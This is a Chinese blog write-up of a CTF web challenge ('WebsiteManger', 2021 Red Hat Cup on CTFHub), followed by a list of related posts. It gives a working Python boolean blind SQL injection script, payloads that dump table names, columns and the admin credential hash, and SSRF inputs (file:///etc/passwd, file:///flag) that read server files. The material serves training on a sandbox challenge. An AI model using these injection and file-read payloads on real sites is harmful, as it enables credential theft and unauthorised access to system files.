CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger

最新推荐文章于 2023-02-15 17:50:21 发布
最新推荐文章于 2023-02-15 17:50:21 发布
阅读量1.5k 收藏 4
点赞数 1
分类专栏: CTFHUB 文章标签: 经验分享 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40872714/article/details/123743827
版权

CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger(布尔盲注、SSRF )

场景描述:最新的网站测试器,作为非站长的你,能利用好它的功能吗?

场景打开后,如下,是个登录框
在这里插入图片描述
查看源码,发现可能的注入点 /image.php?id=2
在这里插入图片描述
布尔盲注

  • /image.php?id=if(1=1,1,5) True
  • /image.php?id=if(1=2,1,5) False
    条件为真时?id=1,回显第一张图片,条件为假时?id=5,没有id=5的图片,什么都没有。即可作为布尔盲注判断条件
from requests import *

allstr = '123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~'

myurl = 'http://challenge-a26d398b5f986b54.sandbox.ctfhub.com:10800/image.php'

info = ''
for i in range(1, 50):
    for s in allstr:
    	#两种注入语句都可以,但是结果有不同
        # payload = '?id=if((ascii(mid(database(),{},1))={}),1,5)'.format(i, ord(s))
        payload = '?id=if(substr(database(),{},1)=\'{}\',1,(select/**/table_name/**/from/**/information_schema.tables))'.format(i, s)
        resp = get(url=myurl + payload)
        if len(resp.text) > 4000:
            info += s
            print(info)

在这里插入图片描述
在这里插入图片描述

#爆破数据库
payload = '?id=if((ascii(mid(database(),{},1))={}),1,5)'.format(i,ord(s))
#爆破表名
payload = '?id=if(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=\'ctf\'),{},1))={},1,5)'.format(i,ord(s))
#爆破列名
payload = '?id=if(ascii(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=\'users\'),{},1))={},1,5)'.format(i,ord(s))
#爆破字段
payload = '?id=if(ascii(mid((select/**/group_concat(username,password)/**/from/**/ctf.users),{},1))={},1,5)'.format(i,ord(s))
这里在做题的时候,发现爆破字段得到的结果不是ctf下的users的字段,因为没有加ctf这个限制,应该是爆破到了其他数据库下的users中的字段,需要加上数据库名ctf的限制条件,不过这里题目有对 ‘and’关键字过滤,所以需要用‘&&’替换,而且还要编码为ulr格式‘%26%26’,这里也是用brupsuit抓包分析了很久才发现的,不过只要有耐心,最终还是会发现。
修改后的payload
payload = '?id=if(ascii(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=\'users\'/**/%26%26/**/table_schema=database()),{},1))={},1,5)'.format(i, ord(s))

关键函数解释

  • mid() 函数:截取字符串一部分,mid(column_name,start[,length])
  • ord() 函数:是 chr() 函数(对于8位的ASCII字符串),它以一个字符(长度为1的字符串)作为参数,返回对应的 ASCII 数值。返回值是对应的十进制整数。
  • group_concat() 函数:连接一个组的所有字符串,并以逗号分隔每一条数据。能一次性查出所有信息。group_concat(str1,str2,…)

查询到的信息

Tables_in_ctf: users,images

Columns_in_users: username,password

values_in_users: adminf5b86501931f812ed3833dee67a43603

输入账号密码后如下
在这里插入图片描述
尝试输入127.0.0.1测试
在这里插入图片描述

curl这里应该存在SSRF

尝试file://协议去读文件,成功
file:///etc/passwd
在这里插入图片描述
直接读flag
file:///flag
在这里插入图片描述
参考:
https://www.cnblogs.com/zhengna/p/15907372.html
https://baijiahao.baidu.com/s?id=1713692186315301136

swpu_jx_1998
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯安全赛-线上赛Writeup 第四届红帽杯安全赛 - 线上赛 Writeup 第四届红帽杯安全赛-线上赛Writeup 第四届红帽杯安全赛-
rhel-server-6.9-x86_64-dvd-iso.txt
06-16
redhat6.9 iso文件 txt文件中是百度网盘的链接和提取码
CTFhub---WebsiteManger
jiet07的博客
11-09 2031
思路 进入题目:刷新,图片会更新 新建标签页打开,有id参数 使用sqlmap 进行测试
ctfhub-历年真题web-WebsiteManger
Ewige的博客
07-12 1597
ctfhub 历年真题 webWebsiteManger题目考点解题思路 WebsiteManger 题目考点 布尔盲注 SSRF 解题思路 进行登入点使用sqlmap 测试无果 仔细观察, 图片链接处存在注入点 使用sqlmap进行测试 sqlmap -u "http://challenge-94b51247b7b2ac6f.sandbox.ctfhub.com:10800/image.php?id=3" --tamper space2mysqlblank --technique=B --
2021红帽杯 WebsiteManger
LYJ20010728的博客
06-22 747
2021红帽杯 WebsiteManger考点思路Payload 考点 布尔盲注、SSRF 思路 尝试一般的登录方法没得用处,F12查看,登录框没有sql注入的利用点,发现还有一张图片,好家伙,sql注入的利用点在图片上 当id的值为0时没有图片回显,利用布尔盲注得到用户密码:14348d305648989c355433b9a04dffce,用户名为:admin,登录进去一个很明显的ssrf考点 猜测 flag在根目录下:file:///flag Payload 盲注脚本 impo
CTFHUB WEBSITE WEBMANAGER 通关
qq_43338937的博客
09-11 337
考点 ssrf 布尔盲注 测试登录页面 username参数位置可以进行布尔盲注 手工测试 a" or sleep(2)--+ 参数使用post提交 保存数据包 利用sqlmap工具进行注入获取数据库 表 用户密码 python3 sqlmap.py -r a.txt --data="username=a&password=a" -p username --curent-db python3 sqlmap.py -r a.txt --data="username=
2021-第四届红帽杯网络安全大赛-find_it | 先备份文件、然代码审计、后正则绕过
一醉一休的博客
09-24 921
小小记录一下
rhel-baseos-9.0-beta-0-x86_64-dvd.iso.rar
04-12
标题中的"rhel-baseos-9.0-beta-0-x86_64-dvd.iso.rar"揭示了我们要讨论的核心内容:Red Hat Enterprise Linux(RHEL)的第9.0版本的BaseOS(基础操作系统)镜像文件。这个版本处于Beta测试阶段,目标平台为64位x86...
第三届“红帽杯网络安全攻防大赛总决赛落幕.pdf
09-20
第三届“红帽杯网络安全攻防大赛总决赛落幕.pdf
Red_Hat_Certificate_RHCSA-rhel_HuHaiLong_红帽认证系统管理员1
08-03
Red Hat, Inc. hereby certifies thathas successfully completed all the program re
[CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it
Anton__1的博客
05-12 2857
[CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it 看群里说CTFHub上复现了, 我来看看 本来想按照红帽杯的套路来试一下,发现phpinfo里莫得flag了 只能想想其他办法咯 <?php #Really easy... $file=fopen("flag.php","r") or die("Unable 2 open!"); $I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize(
2021第四届红帽杯网络安全大赛-线上赛Writeup
热门推荐
末初的CSDN博客
05-10 1万+
文章目录MISC签到colorful codeWEBfind_itframeworkWebsiteMangerezlight 记录一下被锤爆的一天…orz MISC 签到 签到抢了个二血2333,第一次拿二血呜呜呜,虽然是签到,还是很激动。 附件名称叫EBCDIC.zip 010Editor直接选择EBCDIC编码 flag{we1c0me_t0_redhat2021} colorful code WEB find_it 目录扫描发现robots.txt 存在1ndexx.php,直接访问并
2021-第四届红帽杯网络安全大赛-Web-find_it
weixin_40872714的博客
03-26 2371
2021-第四届红帽杯网络安全大赛-Web-find_it 题目 先用目录扫描工具爆破一下目录,发现了robots.txt 访问后有了提示 1ndexx.php 直接访问不到,需要访问vim的保存的缓冲类型文件.swp,访问之后获取到源码。 http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/.1ndexx.php.swp 把关键代码粘贴出来看一下运行流程 打开flag.php读取文件内容 打开hack.php文件,获取co
第四届红帽杯网络安全大赛 Web 部分writeup
feng的博客
05-09 9958
前言 记录一下web的wp,随手写的,只会前三题,确实都很简单。 find_it 扫到robots.txt,发现1ndexx.php,直接访问不了,访问.1ndexx.php.swp得到源码,然后读flag: ?code=<?= show_source(glob('./*')[2]); 再访问hack.php: base32解密一下即可得到flag。 framework 是个yii2的框架,扫出来www.zip下载源码,找到了反序列化的路由,yii2的反序列化之前审过了,直接拿POC打: &lt
CTFHub技能树基础知识——竞赛模式、比赛形式、题目类型
qq_53768302的博客
02-15 159
CTFHub技能树基础知识——竞赛模式、比赛形式、题目类型
CTFHub-web详解
shayebudon的博客
11-20 3439
信息泄露 目录遍历 遍历每一个文件夹,找到flag.txt,复制内容提交 PHPINFO 打开页面,从信息中寻找flag。 备份文件下载 网站源码 尝试各种组合,最后发现在网站后添加www.zip后成功下载压缩文件 将解压后的文件名放在url后,即可出现flag bak文件 下载index.php.bak打开即可看到flag vim缓存 当开发人员在线上环境中使用 vim 编辑器,在使用过程中会留下 vim 编辑器缓存,当vim异常退出时,缓存...
红帽杯2021 Cryptography
LYJ20010728的博客
05-10 546
红帽杯2021 Cryptographyprimegamehpcurve primegame 这道题搬了一道原题:原题链接 采用的方法为低密度攻击的扩展 题目代码: from decimal import * import math import random import struct from flag import flag assert (len(flag) == 48) msg1 = flag[:24] msg2 = flag[24:] pri
CTFHub——Web技能树
mcmuyanga的博客
01-23 763
CTFHub Web 网上收集的资料,本地上传,原文链接丢失,只是整理了一下,记录一下做题过程, 信息泄露 目录遍历 用python脚本找一下flag.txt的路径 import requests url = "http://challenge-9360ebe6745e6c45.sandbox.ctfhub.com:10080/flag_in_here/" for i in range(5): for j in range(5): url_test =url+"/"+s
红帽7.6出现minimal+bash-like+line
最新发布
12-15
根据提供的引用[1],我们可以得知Linux中支持的shell类型包括/bin/sh、/bin/bash、/usr/bin/sh、/usr/bin/bash、/bin/tcsh和/bin/csh。而minimal+bash-like+line是指一个非常基本的shell,它只提供了一些基本的命令和功能,类似于bash shell,但是比bash shell更加轻量级。 如果您的Red Hat Enterprise Linux 7.6系统出现了minimal+bash-like+line,可能是因为您的系统没有安装完整的bash shell。您可以通过以下步骤来解决这个问题: 1.使用root用户登录到系统中。 2.运行以下命令来安装完整的bash shell: ```shell yum install bash ``` 3.等待安装完成后,您可以通过以下命令来检查bash shell的版本: ```shell bash --version ``` 如果您已经安装了bash shell但仍然出现minimal+bash-like+line,那么可能是因为您的系统中的默认shell被更改了。您可以通过以下步骤来更改默认shell: 1.使用root用户登录到系统中。 2.运行以下命令来查看当前默认shell: ```shell echo $SHELL ``` 3.如果输出结果不是/bin/bash,则运行以下命令来更改默认shell: ```shell chsh -s /bin/bash ``` 4.注销并重新登录到系统中,然后再次运行以下命令来检查默认shell是否已更改: ```shell echo $SHELL ``` 如果输出结果是/bin/bash,则说明默认shell已成功更改为bash shell。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值